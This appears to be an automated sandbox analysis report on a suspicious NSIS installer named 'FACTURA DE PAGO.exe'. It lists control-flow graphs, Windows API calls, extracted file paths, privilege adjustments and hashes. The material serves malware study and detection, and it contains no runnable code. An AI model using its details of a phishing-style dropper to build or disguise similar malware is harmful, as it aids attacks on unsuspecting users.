3196 405950 3195->3196 3197 405921 lstrcmpiA 3195->3197 3196->3185 3196->3186 3197->3196 3198 40593f CharNextA 3197->3198 3198->3195 4066 4028aa SendMessageA 4067 4028c4 InvalidateRect 4066->4067 4068 4028cf 4066->4068 4067->4068 3527 4015b3 3528 402a3a 18 API calls 3527->3528 3529 4015ba 3528->3529 3530 40583a 4 API calls 3529->3530 3542 4015c2 3530->3542 3531 40161c 3533 401621 3531->3533 3534 40164a 3531->3534 3532 4057cc CharNextA 3532->3542 3535 401423 25 API calls 3533->3535 3536 401423 25 API calls 3534->3536 3537 401628 3535->3537 3544 401642 3536->3544 3546 405d2f lstrcpynA 3537->3546 3538 40548b 2 API calls 3538->3542 3540 401633 SetCurrentDirectoryA 3540->3544 3541 4054a8 5 API calls 3541->3542 3542->3531 3542->3532 3542->3538 3542->3541 3543 401604 GetFileAttributesA 3542->3543 3545 40540e 4 API calls 3542->3545 3543->3542 3545->3542 3546->3540 4069 4016b3 4070 402a3a 18 API calls 4069->4070 4071 4016b9 GetFullPathNameA 4070->4071 4072 4016d0 4071->4072 4073 4016f1 4071->4073 4072->4073 4076 406033 2 API calls 4072->4076 4074 401705 GetShortPathNameA 4073->4074 4075 4028cf 4073->4075 4074->4075 4077 4016e1 4076->4077 4077->4073 4079 405d2f lstrcpynA 4077->4079 4079->4073 4080 4014b7 4081 4014bd 4080->4081 4082 401389 2 API calls 4081->4082 4083 4014c5 4082->4083 4084 401d38 GetDC GetDeviceCaps 4085 402a1d 18 API calls 4084->4085 4086 401d56 MulDiv ReleaseDC 4085->4086 4087 402a1d 18 API calls 4086->4087 4088 401d75 4087->4088 4089 405d51 18 API calls 4088->4089 4090 401dae CreateFontIndirectA 4089->4090 4091 402513 4090->4091 3551 404ebc 3552 404ee0 3551->3552 3553 404ecc 3551->3553 3554 404ee8 IsWindowVisible 3552->3554 3563 404f08 3552->3563 3555 404ed2 3553->3555 3556 404f29 3553->3556 3554->3556 3557 404ef5 3554->3557 3559 403f60 SendMessageA 3555->3559 3558 404f2e CallWindowProcA 3556->3558 3560 404813 5 API calls 3557->3560 3561 404edc 3558->3561 3559->3561 3562 404eff 3560->3562 3562->3563 3563->3558 3564 404893 4 API calls 3563->3564 3564->3556 3565 40173e 3566 402a3a 18 API calls 3565->3566 3567 401745 3566->3567 3568 4059d1 2 API calls 3567->3568 3569 40174c 3568->3569 3570 4059d1 2 API calls 3569->3570 3570->3569 4092 401ebe 4093 402a3a 18 API calls 4092->4093 4094 401ec5 4093->4094 4095 406033 2 API calls 4094->4095 4096 401ecb 4095->4096 4098 401edd 4096->4098 4099 405c8d wsprintfA 4096->4099 4099->4098 4100 40193f 4101 402a3a 18 API calls 4100->4101 4102 401946 lstrlenA 4101->4102 4103 402513 4102->4103

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 0 40310f-403144 SetErrorMode GetVersion 1 403146-40314e call 4060c8 0->1 2 403157 0->2 1->2 8 403150 1->8 3 40315c-40316f call 40605a lstrlenA 2->3 9 403171-4031e4 call 4060c8 * 2 #17 OleInitialize SHGetFileInfoA call 405d2f GetCommandLineA call 405d2f GetModuleHandleA 3->9 8->2 18 4031f0-403205 call 4057cc CharNextA 9->18 19 4031e6-4031eb 9->19 22 4032ca-4032ce 18->22 19->18 23 4032d4 22->23 24 40320a-40320d 22->24 27 4032e7-403301 GetTempPathA call 4030de 23->27 25 403215-40321d 24->25 26 40320f-403213 24->26 28 403225-403228 25->28 29 40321f-403220 25->29 26->25 26->26 37 403303-403321 GetWindowsDirectoryA lstrcatA call 4030de 27->37 38 403359-403373 DeleteFileA call 402c66 27->38 31 4032ba-4032c7 call 4057cc 28->31 32 40322e-403232 28->32 29->28 31->22 47 4032c9 31->47 35 403234-40323a 32->35 36 40324a-403277 32->36 41 403240 35->41 42 40323c-40323e 35->42 43 403279-40327f 36->43 44 40328a-4032b8 36->44 37->38 55 403323-403353 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4030de 37->55 52 403407-403417 call 4035d5 OleUninitialize 38->52 53 403379-40337f 38->53 41->36 42->36 42->41 49 403281-403283 43->49 50 403285 43->50 44->31 46 4032d6-4032e2 call 405d2f 44->46 46->27 47->22 49->44 49->50 50->44 66 40353b-403541 52->66 67 40341d-40342d call 405525 ExitProcess 52->67 56 403381-40338c call 4057cc 53->56 57 4033f7-4033fe call 4036af 53->57 55->38 55->52 68 4033c2-4033cc 56->68 69 40338e-4033b7 56->69 64 403403 57->64 64->52 71 403543-40355c GetCurrentProcess OpenProcessToken 66->71 72 4035bd-4035c5 66->72 78 403433-403447 call 4054a8 lstrcatA 68->78 79 4033ce-4033db call 40588f 68->79 75 4033b9-4033bb 69->75 73 40358e-40359c call 4060c8 71->73 74 40355e-403588 LookupPrivilegeValueA AdjustTokenPrivileges 71->74 76 4035c7 72->76 77 4035cb-4035cf ExitProcess 72->77 90 4035aa-4035b4 ExitWindowsEx 73->90 91 40359e-4035a8 73->91 74->73 75->68 82 4033bd-4033c0 75->82 76->77 88 403454-40346e lstrcatA lstrcmpiA 78->88 89 403449-40344f lstrcatA 78->89 79->52 92 4033dd-4033f3 call 405d2f * 2 79->92 82->68 82->75 88->52 94 403470-403473 88->94 89->88 90->72 95 4035b6-4035b8 call 40140b 90->95 91->90 91->95 92->57 97 403475-40347a call 40540e 94->97 98 40347c call 40548b 94->98 95->72 106 403481-40348e SetCurrentDirectoryA 97->106 98->106 107 403490-403496 call 405d2f 106->107 108 40349b-4034c3 call 405d2f 106->108 107->108 112 4034c9-4034e5 call 405d51 DeleteFileA 108->112 115 403526-40352d 112->115 116 4034e7-4034f7 CopyFileA 112->116 115->112 118 40352f-403536 call 405bea 115->118 116->115 117 4034f9-403519 call 405bea call 405d51 call 4054c0 116->117 117->115 127 40351b-403522 CloseHandle 117->127 118->52 127->115
                                                                                        APIs
                                                                                        • SetErrorMode.KERNELBASE ref: 00403134
                                                                                        • GetVersion.KERNEL32 ref: 0040313A
                                                                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403163
                                                                                        • #17.COMCTL32(00000007,00000009), ref: 00403185
                                                                                        • OleInitialize.OLE32(00000000), ref: 0040318C
                                                                                        • SHGetFileInfoA.SHELL32(00428828,00000000,?,00000160,00000000), ref: 004031A8
                                                                                        • GetCommandLineA.KERNEL32(Trehagen Setup,NSIS Error), ref: 004031BD
                                                                                        • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\FACTURA DE PAGO.exe",00000000), ref: 004031D0
                                                                                        • CharNextA.USER32(00000000,"C:\Users\user\Desktop\FACTURA DE PAGO.exe",00000020), ref: 004031FB
                                                                                        • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004032F8
                                                                                        • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403309
                                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403315
                                                                                        • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403329
                                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403331
                                                                                        • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403342
                                                                                        • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040334A
                                                                                        • DeleteFileA.KERNELBASE(1033), ref: 0040335E
                                                                                          • Part of subcall function 004060C8: GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                                                          • Part of subcall function 004060C8: GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                                                        • OleUninitialize.OLE32(?), ref: 0040340C
                                                                                        • ExitProcess.KERNEL32 ref: 0040342D
                                                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 0040354A
                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00403551
                                                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403569
                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403588
                                                                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 004035AC
                                                                                        • ExitProcess.KERNEL32 ref: 004035CF
                                                                                          • Part of subcall function 00405525: MessageBoxIndirectA.USER32(00409218), ref: 00405580
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
                                                                                        • String ID: "$"C:\Users\user\Desktop\FACTURA DE PAGO.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian$C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kinna$C:\Users\user\Desktop$C:\Users\user\Desktop\FACTURA DE PAGO.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$Trehagen Setup$UXTHEME$\Temp$`Kt$~nsu
                                                                                        • API String ID: 3329125770-178197675
                                                                                        • Opcode ID: dcb38b1e2b76dc19c0501d8e0158ad62898b17a6a9361bfb335ac8dc35fe19f6
                                                                                        • Instruction ID: 749ed98c63e487a66f460374afa67f5348490bcf6ac540fe4d7c6930d14d49f5
                                                                                        • Opcode Fuzzy Hash: dcb38b1e2b76dc19c0501d8e0158ad62898b17a6a9361bfb335ac8dc35fe19f6
                                                                                        • Instruction Fuzzy Hash: E1C105306086416AE7216F61AC4DA6F3EACEF46706F04457FF541BA1E3C77C9A058B2E

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 128 4048c5-404911 GetDlgItem * 2 129 404b31-404b38 128->129 130 404917-4049ab GlobalAlloc LoadBitmapA SetWindowLongA ImageList_Create ImageList_AddMasked SendMessageA * 2 128->130 131 404b3a-404b4a 129->131 132 404b4c 129->132 133 4049ba-4049c1 DeleteObject 130->133 134 4049ad-4049b8 SendMessageA 130->134 135 404b4f-404b58 131->135 132->135 136 4049c3-4049cb 133->136 134->133 137 404b63-404b69 135->137 138 404b5a-404b5d 135->138 139 4049f4-4049f8 136->139 140 4049cd-4049d0 136->140 144 404b78-404b7f 137->144 145 404b6b-404b72 137->145 138->137 141 404c47-404c4e 138->141 139->136 146 4049fa-404a26 call 403f14 * 2 139->146 142 4049d2 140->142 143 4049d5-4049f2 call 405d51 SendMessageA * 2 140->143 151 404c50-404c56 141->151 152 404cbf-404cc7 141->152 142->143 143->139 148 404b81-404b84 144->148 149 404bf4-404bf7 144->149 145->141 145->144 185 404af0-404b03 GetWindowLongA SetWindowLongA 146->185 186 404a2c-404a32 146->186 157 404b86-404b8d 148->157 158 404b8f-404ba4 call 404813 148->158 149->141 153 404bf9-404c03 149->153 160 404ea7-404eb9 call 403f7b 151->160 161 404c5c-404c66 151->161 155 404cd1-404cd8 152->155 156 404cc9-404ccf SendMessageA 152->156 163 404c13-404c1d 153->163 164 404c05-404c11 SendMessageA 153->164 165 404cda-404ce1 155->165 166 404d0c-404d13 155->166 156->155 157->149 157->158 158->149 184 404ba6-404bb7 158->184 161->160 169 404c6c-404c7b SendMessageA 161->169 163->141 171 404c1f-404c29 163->171 164->163 172 404ce3-404ce4 ImageList_Destroy 165->172 173 404cea-404cf1 165->173 176 404e69-404e70 166->176 177 404d19-404d25 call 4011ef 166->177 169->160 178 404c81-404c92 SendMessageA 169->178 180 404c3a-404c44 171->180 181 404c2b-404c38 171->181 172->173 182 404cf3-404cf4 GlobalFree 173->182 183 404cfa-404d06 173->183 176->160 179 404e72-404e79 176->179 203 404d35-404d38 177->203 204 404d27-404d2a 177->204 188 404c94-404c9a 178->188 189 404c9c-404c9e 178->189 179->160 191 404e7b-404ea5 ShowWindow GetDlgItem ShowWindow 179->191 180->141 181->141 182->183 183->166 184->149 193 404bb9-404bbb 184->193 192 404b09-404b0d 185->192 194 404a35-404a3b 186->194 188->189 190 404c9f-404cb8 call 401299 SendMessageA 188->190 189->190 190->152 191->160 197 404b27-404b2f call 403f49 192->197 198 404b0f-404b22 ShowWindow call 403f49 192->198 199 404bbd-404bc4 193->199 200 404bce 193->200 201 404ad1-404ae4 194->201 202 404a41-404a69 194->202 197->129 198->160 213 404bc6-404bc8 199->213 214 404bca-404bcc 199->214 217 404bd1-404bed call 40117d 200->217 201->194 208 404aea-404aee 201->208 215 404aa3-404aa5 202->215 216 404a6b-404aa1 SendMessageA 202->216 209 404d79-404d9d call 4011ef 203->209 210 404d3a-404d53 call 4012e2 call 401299 203->210 205 404d2c 204->205 206 404d2d-404d30 call 404893 204->206 205->206 206->203 208->185 208->192 229 404da3 209->229 230 404e3f-404e53 InvalidateRect 209->230 238 404d63-404d72 SendMessageA 210->238 239 404d55-404d5b 210->239 213->217 214->217 218 404aa7-404ab6 SendMessageA 215->218 219 404ab8-404ace SendMessageA 215->219 216->201 217->149 218->201 219->201 232 404da6-404db1 229->232 230->176 234 404e55-404e64 call 4047e6 call 4047ce 230->234 235 404db3-404dc2 232->235 236 404e27-404e39 232->236 234->176 240 404dc4-404dd1 235->240 241 404dd5-404dd8 235->241 236->230 236->232 238->209 242 404d5d 239->242 243 404d5e-404d61 239->243 240->241 245 404dda-404ddd 241->245 246 404ddf-404de8 241->246 242->243 243->238 243->239 248 404ded-404e25 SendMessageA * 2 245->248 246->248 249 404dea 246->249 248->236 249->248
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,000003F9), ref: 004048DD
                                                                                        • GetDlgItem.USER32(?,00000408), ref: 004048E8
                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404932
                                                                                        • LoadBitmapA.USER32(0000006E), ref: 00404945
                                                                                        • SetWindowLongA.USER32(?,000000FC,00404EBC), ref: 0040495E
                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404972
                                                                                        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404984
                                                                                        • SendMessageA.USER32(?,00001109,00000002), ref: 0040499A
                                                                                        • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004049A6
                                                                                        • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004049B8
                                                                                        • DeleteObject.GDI32(00000000), ref: 004049BB
                                                                                        • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004049E6
                                                                                        • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004049F2
                                                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A87
                                                                                        • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404AB2
                                                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404AC6
                                                                                        • GetWindowLongA.USER32(?,000000F0), ref: 00404AF5
                                                                                        • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404B03
                                                                                        • ShowWindow.USER32(?,00000005), ref: 00404B14
                                                                                        • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404C11
                                                                                        • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404C76
                                                                                        • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404C8B
                                                                                        • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404CAF
                                                                                        • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404CCF
                                                                                        • ImageList_Destroy.COMCTL32(?), ref: 00404CE4
                                                                                        • GlobalFree.KERNEL32(?), ref: 00404CF4
                                                                                        • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404D6D
                                                                                        • SendMessageA.USER32(?,00001102,?,?), ref: 00404E16
                                                                                        • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404E25
                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00404E45
                                                                                        • ShowWindow.USER32(?,00000000), ref: 00404E93
                                                                                        • GetDlgItem.USER32(?,000003FE), ref: 00404E9E
                                                                                        • ShowWindow.USER32(00000000), ref: 00404EA5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                        • String ID: $M$N
                                                                                        • API String ID: 1638840714-813528018
                                                                                        • Opcode ID: 98e2d7c6ee6a234b068a5e6a8c88a9cece07b0d44b3c2dcd542ae9ed88053873
                                                                                        • Instruction ID: ee94c2e81ac7fcd3d2633371b1ae487f30220c2a0e0de663c2dd45f1c85c3c3c
                                                                                        • Opcode Fuzzy Hash: 98e2d7c6ee6a234b068a5e6a8c88a9cece07b0d44b3c2dcd542ae9ed88053873
                                                                                        • Instruction Fuzzy Hash: D70262B0A00209AFEB20DF55DC45AAE7BB5FB84315F14413AF610BA2E1C7799D51CF58

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 494 405d51-405d5c 495 405d5e-405d6d 494->495 496 405d6f-405d84 494->496 495->496 497 405f77-405f7b 496->497 498 405d8a-405d95 496->498 499 405f81-405f8b 497->499 500 405da7-405db1 497->500 498->497 501 405d9b-405da2 498->501 502 405f96-405f97 499->502 503 405f8d-405f91 call 405d2f 499->503 500->499 504 405db7-405dbe 500->504 501->497 503->502 506 405dc4-405df9 504->506 507 405f6a 504->507 508 405f14-405f17 506->508 509 405dff-405e0a GetVersion 506->509 510 405f74-405f76 507->510 511 405f6c-405f72 507->511 514 405f47-405f4a 508->514 515 405f19-405f1c 508->515 512 405e24 509->512 513 405e0c-405e10 509->513 510->497 511->497 519 405e2b-405e32 512->519 513->512 516 405e12-405e16 513->516 520 405f58-405f68 lstrlenA 514->520 521 405f4c-405f53 call 405d51 514->521 517 405f2c-405f38 call 405d2f 515->517 518 405f1e-405f2a call 405c8d 515->518 516->512 522 405e18-405e1c 516->522 532 405f3d-405f43 517->532 518->532 524 405e34-405e36 519->524 525 405e37-405e39 519->525 520->497 521->520 522->512 528 405e1e-405e22 522->528 524->525 530 405e72-405e75 525->530 531 405e3b-405e5e call 405c16 525->531 528->519 535 405e85-405e88 530->535 536 405e77-405e83 GetSystemDirectoryA 530->536 543 405e64-405e6d call 405d51 531->543 544 405efb-405eff 531->544 532->520 534 405f45 532->534 541 405f0c-405f12 call 405f9a 534->541 538 405ef2-405ef4 535->538 539 405e8a-405e98 GetWindowsDirectoryA 535->539 537 405ef6-405ef9 536->537 537->541 537->544 538->537 542 405e9a-405ea4 538->542 539->538 541->520 547 405ea6-405ea9 542->547 548 405ebe-405ed4 SHGetSpecialFolderLocation 542->548 543->537 544->541 550 405f01-405f07 lstrcatA 544->550 547->548 551 405eab-405eb2 547->551 552 405ed6-405eed SHGetPathFromIDListA CoTaskMemFree 548->552 553 405eef 548->553 550->541 555 405eba-405ebc 551->555 552->537 552->553 553->538 555->537 555->548
                                                                                        APIs
                                                                                        • GetVersion.KERNEL32(?,00429048,00000000,00404F80,00429048,00000000), ref: 00405E02
                                                                                        • GetSystemDirectoryA.KERNEL32(Space required: ,00000400), ref: 00405E7D
                                                                                        • GetWindowsDirectoryA.KERNEL32(Space required: ,00000400), ref: 00405E90
                                                                                        • SHGetSpecialFolderLocation.SHELL32(?,0041C205), ref: 00405ECC
                                                                                        • SHGetPathFromIDListA.SHELL32(0041C205,Space required: ), ref: 00405EDA
                                                                                        • CoTaskMemFree.OLE32(0041C205), ref: 00405EE5
                                                                                        • lstrcatA.KERNEL32(Space required: ,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F07
                                                                                        • lstrlenA.KERNEL32(Space required: ,?,00429048,00000000,00404F80,00429048,00000000), ref: 00405F59
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion$Space required: $\Microsoft\Internet Explorer\Quick Launch
                                                                                        • API String ID: 900638850-1002770640
                                                                                        • Opcode ID: 672f3ffac8e58b905acbb07927a48302432eebfa17072ae61d639ec34a28093f
                                                                                        • Instruction ID: d2d5afd6cadd1c558da9919d7f7a0e519c97b97f5b6dedc277a7ce0050389877
                                                                                        • Opcode Fuzzy Hash: 672f3ffac8e58b905acbb07927a48302432eebfa17072ae61d639ec34a28093f
                                                                                        • Instruction Fuzzy Hash: 99610671A04916ABEF216B24DC85BBF7BA8DB15314F10813BE941BA2D1D33C4942DF9E

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 556 4055d1-4055f7 call 40588f 559 405610-405617 556->559 560 4055f9-40560b DeleteFileA 556->560 562 405619-40561b 559->562 563 40562a-40563a call 405d2f 559->563 561 40579a-40579e 560->561 564 405621-405624 562->564 565 405748-40574d 562->565 571 405649-40564a call 4057e8 563->571 572 40563c-405647 lstrcatA 563->572 564->563 564->565 565->561 567 40574f-405752 565->567 569 405754-40575a 567->569 570 40575c-405764 call 406033 567->570 569->561 570->561 580 405766-40577a call 4057a1 call 405589 570->580 574 40564f-405652 571->574 572->574 576 405654-40565b 574->576 577 40565d-405663 lstrcatA 574->577 576->577 579 405668-405686 lstrlenA FindFirstFileA 576->579 577->579 581 40568c-4056a3 call 4057cc 579->581 582 40573e-405742 579->582 595 405792-405795 call 404f48 580->595 596 40577c-40577f 580->596 589 4056a5-4056a9 581->589 590 4056ae-4056b1 581->590 582->565 584 405744 582->584 584->565 589->590 592 4056ab 589->592 593 4056b3-4056b8 590->593 594 4056c4-4056d2 call 405d2f 590->594 592->590 598 4056ba-4056bc 593->598 599 40571d-40572f FindNextFileA 593->599 607 4056d4-4056dc 594->607 608 4056e9-4056f4 call 405589 594->608 595->561 596->569 601 405781-405790 call 404f48 call 405bea 596->601 598->594 604 4056be-4056c2 598->604 599->581 602 405735-405738 FindClose 599->602 601->561 602->582 604->594 604->599 607->599 609 4056de-4056e7 call 4055d1 607->609 616 405715-405718 call 404f48 608->616 617 4056f6-4056f9 608->617 609->599 616->599 618 4056fb-40570b call 404f48 call 405bea 617->618 619 40570d-405713 617->619 618->599 619->599
                                                                                        APIs
                                                                                        • DeleteFileA.KERNELBASE(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004055FA
                                                                                        • lstrcatA.KERNEL32(0042A870,\*.*,0042A870,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405642
                                                                                        • lstrcatA.KERNEL32(?,00409014,?,0042A870,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405663
                                                                                        • lstrlenA.KERNEL32(?,?,00409014,?,0042A870,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405669
                                                                                        • FindFirstFileA.KERNEL32(0042A870,?,?,?,00409014,?,0042A870,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040567A
                                                                                        • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405727
                                                                                        • FindClose.KERNEL32(00000000), ref: 00405738
                                                                                        Strings
                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004055DE
                                                                                        • \*.*, xrefs: 0040563C
                                                                                        • "C:\Users\user\Desktop\FACTURA DE PAGO.exe", xrefs: 004055D1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                        • String ID: "C:\Users\user\Desktop\FACTURA DE PAGO.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                        • API String ID: 2035342205-3189792215
